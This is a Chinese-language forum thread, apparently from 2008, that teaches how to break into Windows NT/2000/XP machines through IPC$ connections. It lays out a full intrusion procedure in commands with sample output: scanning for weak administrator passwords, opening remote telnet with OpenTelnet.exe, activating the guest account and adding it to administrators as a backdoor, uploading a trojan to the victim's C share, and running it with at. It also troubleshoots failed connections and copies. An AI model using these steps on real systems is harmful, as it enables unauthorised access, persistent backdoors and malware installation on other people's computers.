11.我建立了一个连接f:\>net use \\*.*.*.*\ipc$ "123" /user:"ccbirds" 成功了,但当我映射时出现了错误,向我要密码,怎么回事?
F:\>net use h: \\*.*.*.*\c$
密码在 \\*.*.*.*\c$ 无效。
请键入 \\*.*.*.*\c$ 的密码:
系统发生 5 错误。
拒绝访问。

答:呵呵,向你要密码说明你当前使用的用户权限不够,不能映射C$这个默认共享,想办法提升权限或者找管理员的弱口令吧!默认共享一般是需要管理员权限的。


12.我用superscan扫到了一个开了139端口的主机,但为什么不能空连接呢?

答:你混淆了ipc$与139的关系,能进行ipc$连接的主机一定开了139或445端口,但开这两个端口的主机可不一定能空连接,因为对方可以关闭ipc$共享.


13.我门局域网里的机器大多都是xp,我用流光扫描到几个administrator帐号口令是空,而且可以连接,但不能复制东西,说错误5。请问为什么?

答:xp的安全性要高一些,在安全策略的默认设置中,对本地帐户的网络登录进行身份验证的时候,默认为来宾权限,即使你用管理员远程登录,也只具有来宾权限,因此你复制文件,当然是错误5:权限不够。


14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功,可是 net use i: \\192.168.0.2\c
出现请键入 \\192.168.0.2 的密码,怎么回事情呢?

答:虽然你具有管理员权限,但管理员在设置c盘共享权限时可能并未设置允许administrator访问,所以会出现问题。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 41 发表于: 2008-06-14 22:44:41
ipc$详细解说大全(3)


十二 ipc$完整入侵步骤祥解

其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!

1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空


2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧


3上面开telnet的命令没忘吧,要用到opentelnet这个小程序
c:\>OpenTelnet.exe \\192.168.21.* administrator "" 1 90
如果返回如下信息
*******************************************************
Remote Telnet Configure, by refdom
Email: refdom@263.net
OpenTelnet.exe

Usage:OpenTelnet.exe \\server username password NTLMAuthor telnetport
*******************************************************
Connecting \\192.168.21.*...Successfully!

NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23

Starting telnet service...
telnet service is started successfully! telnet service is running!

BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
*说明你已经打开了一个端口90的telnet。


4 现在我们telnet上去
telnet 192.168.21.* 90
如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了


5 C:\>net user guest /active:yes
*将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no


6 C:\>net user guest 1234
*将Guest的密码改为1234,或者改成你喜欢的密码


7 C:\>net localgroup administrators guest /add
*将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。


8 好了,现在我们来走另一条路,给它传个木马玩玩


9 首先,我们先建立起ipc$连接
C:\>net use \\192.168.21.*\ipc$ "" /user:administrator


10 既然要上传东西,就要先知道它开了什么共享
C:\>net view \\192.168.21.*
在 \\192.168.21.*的共享资源
资源共享名 类型 用途 注释

-----------------------------------------------------------
C Disk
D Disk
命令成功完成。
*好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。


11 C:\>copy love.exe \\192.168.21.*\c
已复制 1 个文件
*用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是最好的了,不容易被发现


12 运行木马前,我们先看看它现在的时间
net time \\192.168.21.*
\\192.168.21.*的当前时间是 2003/8/22 上午 11:00
命令成功完成


13 现在我们用at运行它吧,不过对方一定要开了Task Scheduler服务(允许程序在指定时间运行),否则就不行了
C:\>at \\192.168.21.* 11:02 c:\love.exe
新加了一项作业,其作业 ID = 1
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 40 发表于: 2008-06-14 22:44:25
ipc$详细解说大全(2)

七 ipc$连接失败的常见原因

以下是一些常见的导致ipc$连接失败的原因:


1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的;


2 如果想成功的建立一个ipc$连接,就需要对方开启ipc$共享,即使是空连接也是这样,如果对方关闭了ipc$共享,你将会建立失败;


3 你未启动Lanmanworkstation服务,它提供网络链结和通讯,没有它你无法发起连接请求(显示名为:Workstation);


4 对方未启动Lanmanserver服务,它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依赖于此服务,没有它远程主机将无法响应你的连接请求(显示名为:Server);


5 对方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份;


6 对方禁止了NBT(即未打开139端口);


7 对方防火墙屏蔽了139和445端口;


8 你的用户名或者密码错误(显然空会话排除这种错误);


9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号""即可;


10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。


另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。







八 复制文件失败的原因


有些朋友虽然成功的建立了ipc$连接,但在copy时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢?


1 盲目复制
这类错误出现的最多,占到50%以上。许多朋友甚至都不知道对方是否有共享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下对方的共享情况,不要认为ipc$连接建立成功了就一定有共享文件夹。


2 默认共享判断错误
这类错误也是大家经常犯的,主要有两个小方面:

1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连接之后马上向admin$之类的默认共享复制文件,导致复制失败。ipc$ 连接成功只能说明对方打开了ipc$共享,ipc$共享与默认共享是两码事,ipc$共享是一个命名管道,并不是哪个实际的文件夹,而默认共享并不是 ipc$共享的必要条件;

2)由于net view \\IP 无法显示默认共享(因为默认共享带$),因此通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共享,那么所有向默认共享进行的想跳楼作都不能成功;(不过大部分扫描软件在扫弱口令的同时,都能扫到默认共享目录,可以避免此类错误的发生)


3用户权限不够,包括四种情形:
1)空连接向所有共享(默认共享和普通共享)复制时,大多情况下权限是不够的;
2)向默认共享复制时,要具有管理员权限;
3)向普通共享复制时,要具有相应权限(即对方事先设定的访问权限);
4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;

还需要说明一点:不要认为administrator就一定是管理员,管理员名称是可以改的。


4被防火墙杀死或在局域网
也许你的复制想跳楼作已经成功,但当远程运行时,被防火墙杀掉了,导致找不到文件;还有可能你把木马复制到了局域网内的主机,导致连接失败。因此建议你复制时要小心,否则就前功尽弃了。


呵呵,大家也知道,ipc$连接在实际想跳楼作过程中会出现千奇百怪的问题,上面我所总结的只是一些常见错误,没说到的,只能让大家自己去体会了。


九 如何打开目标的IPC$共享以及其他共享


目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马等,然后在shell下执行 net share ipc$来开放目标的ipc$,用net share ipc$ /del来关闭共享。如果你要给它开共享文件夹,你可以用net share baby=c:\,这样就把它的c盘开为共享名为baby共享了。


十 一些需要shell才能完成的命令


看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令:

1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的想跳楼作需要在shell下完成;

2 打开远程主机的ipc$共享,默认共享,普通共享的想跳楼作需要在shell下完成;

3 运行/关闭远程主机的服务,需要在shell下完成;

4 启动/杀掉远程主机的进程,也需要在shell下完成。


十一 入侵中可能会用到的相关命令


请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。

1 建立空连接:
net use \\IP\ipc$ "" /user:""

2 建立非空连接:
net use \\IP\ipc$ "psw" /user:"account"

3 查看远程主机的共享资源(但看不到默认共享)
net view \\IP

4 查看本地主机的共享资源(可以看到本地的默认共享)
net share

5 得到远程主机的用户名列表
nbtstat -A IP

6 得到本地主机的用户列表
net user

7 查看远程主机的当前时间
net time \\IP

8 显示本地主机当前服务
net start

9 启动/关闭本地服务
net start 服务名 /y
net stop 服务名 /y

10 映射远程共享:
net use z: \\IP\baby
此命令将共享名为baby的共享资源映射到z盘

11 删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del /y删除全部

12 向远程主机复制文件
copy \路径\srv.exe \\IP\共享目录名,如:
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内

13 远程添加计划任务
at \\ip 时间 程序名,如:
at \\127.0.0.0 11:00 love.exe
注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径


14 开启远程主机的telnet
这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:

1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就该ntlm认证
4)对WIN2K/XP有效,NT未经测试
命令格式:OpenTelnet.exe \\server account psw NTLM认证方式 port
试例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90

15 激活用户/加入管理员组
1 net uesr account /active:yes
2 net localgroup administrators account /add

16 关闭远程主机的telnet
同样需要一个小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \\server account psw
试例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""

17 删除一个已建立的ipc$连接
net use \\IP\ipc$ /del